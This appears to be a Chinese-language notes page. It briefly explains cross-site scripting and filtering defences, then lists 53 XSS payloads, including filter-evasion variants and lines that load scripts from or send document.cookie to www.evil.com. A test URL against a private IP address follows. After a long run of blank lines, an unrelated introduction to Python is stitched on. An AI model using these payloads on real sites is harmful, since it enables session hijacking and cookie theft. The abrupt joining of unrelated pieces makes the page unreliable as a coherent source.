Security

1. XSS:利用<script>标签、事件属性、样式标签、字符编码等方式注入恶意脚本，以触发弹窗、窃取用户信息等行为。

表单数据指定值的类型：年龄只能是 int 、name 只能是字母数字等。

过滤或移除特殊的 html 标签：<script>、<iframe>等。

过滤 js 事件的标签：onclick、onerror、onfocus等。

1.<script> alert(1);</script>

2.<script>alert('xss');</script>

3.<script  src="http://www.evil.com/cookie.php"></script>

4.<script>location.href="http://www.evil.com/cookies.php?cookie="+escape(document.cookie)"</script>

5.<scr<script>ipt>alert('xss');</scr</script>ipt>

6.<img src=liu.jpg οnerrοr=alert(/xss/)/>

7.<style>@im\port'\ja\vasc\ript:alert(\"xss\")';</style>

8.<?echo('<src)'; echo('ipt>alert(\"xss\")';</script>');?>

9.<marquee><script>alert('xss')</script></marquee>

10.<IMG SRC=\"jav�x9;ascript:alert('xss');\">

11.<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

12."><script>alert(1)</script>

13.<script src=http://www.evil.com/files.js></script>

14.</title><script>alert(/xss/)</script>

15.</textarea><script>alert(/xss)</script>

16.<IMG LOWSRC=\"javascript:alert('XSS')\">

17.<IMG DYNSRC=\"javascript:alert('XSS')\">

18.<font style='color:expression(alert(document.cookie))'>

19.');alert('XSS

20.<img src="javascript:alert('XSS')">

21.[url=javascript:alert('XSS');]click me[/url]

22.<body οnunlοad="javascript:alert('XSS');">

23.<body onLoad="alert('XSS');"

24.[color=red' οnmοuseοver="alert('XSS')"]mouse over[/color]

25."/></a></><img src=1.gif οnerrοr=alert(1)>

26.window.alert("XSS");

27.<div style="x:expression((window==1)?":eval('r=1;alert(String.fromCharCode(83,83,83));'))">

28.<iframe<?php eval chr(11)?>οnlοad=alert('XSS')></iframe>

29."><script alert(String.fromCharCode(88,83,83))</script>

30.'>><marquee><h1>XSS<h1></marquee>

31.'">><script>alert('xss')</script>

32.'">><marquee><h1>XSS</h1></marquee>

33.<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">

34.<META HTTP-EQUIV=\"refresh\"CONTENT=\"0;URL=http://;url=javascript:alert('XSS');\">

35.<script>var var=1; alert(var)</script>

36.<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

37.<?='<SCRIPT>alert("XSS")</SCRIPT>'?>

38.<IMG SRC='vbscript:msgbox(\"XSS\")'>

39."οnfοcus=alert(document.domain)"><"

40.<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>

41.<STYLE>li {list-style-image:url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS

42.<br size=\"&{alert('xss')}\">

43.<scrscriptipt>alert(1)</scrscriptipt>

44."><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

45.[color=red width=expression(alert(123))][color]

46.<BASE HREF="javascript:alert('XSS');//">

47.Execute(MsgBox(chr(88)&&chr(83)&&chr(83)))<

48."></iframe><script>alert(123)</script>

49.<body onLoad="while(true) alert('XSS');">

50."<marquee><img src=k.png οnerrοr=alert(/xss/) />

51.<div style="background:url('javascript:')

52.<img src='java\nscript:alert(\"XSS\")'>

53.>'"><img src="javascript:alert('xss')">

 2.

http://192.168.163.131/test.php?test=ceshi

http://192.168.163.131/test.php?test=< script>alert(/test!!!/)< /script>

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

什么是 Python？

Python 是一门流行的编程语言。它由 Guido van Rossum 创建，于 1991 年发布。

它用于：

• Web 开发（服务器端）
• 软件开发
• 数学
• 系统脚本

Python 可以做什么？

• 可以在服务器上使用 Python 来创建 Web 应用程序。
• Python 可以与软件一起使用来创建工作流。
• Python 可以连接到数据库系统。它还可以读取和修改文件。
• Python 可用于处理大数据并执行复杂的数学运算。
• Python 可用于快速原型设计，也可用于生产就绪的软件开发。

为何选择 Python？

• Python 适用于不同的平台（Windows、Mac、Linux、Raspberry Pi 等）。
• Python 有一种类似于英语的简单语法。
• Python 的语法允许开发人员用比其他编程语言更少的代码行编写程序。
• Python 在解释器系统上运行，这意味着代码可以在编写后立即执行。这也意味着原型设计可以非常快。
• Python 可以以程序方式、面向对象的方式或功能方式来处理。

请您知晓

Python 的最新主要版本是 Python 3，我们将在本教程中使用它。但是，Python 2 虽然没有更新安全更新以外的任何东西，但仍然非常受欢迎。

在本教程中，我们将在在文本编辑器中编写 Python。您也可以在集成开发环境中编写 Python，例如 Thonny、Pycharm、Netbeans 或 Eclipse，这一点当您在管理大量 Python 文件时特别有用。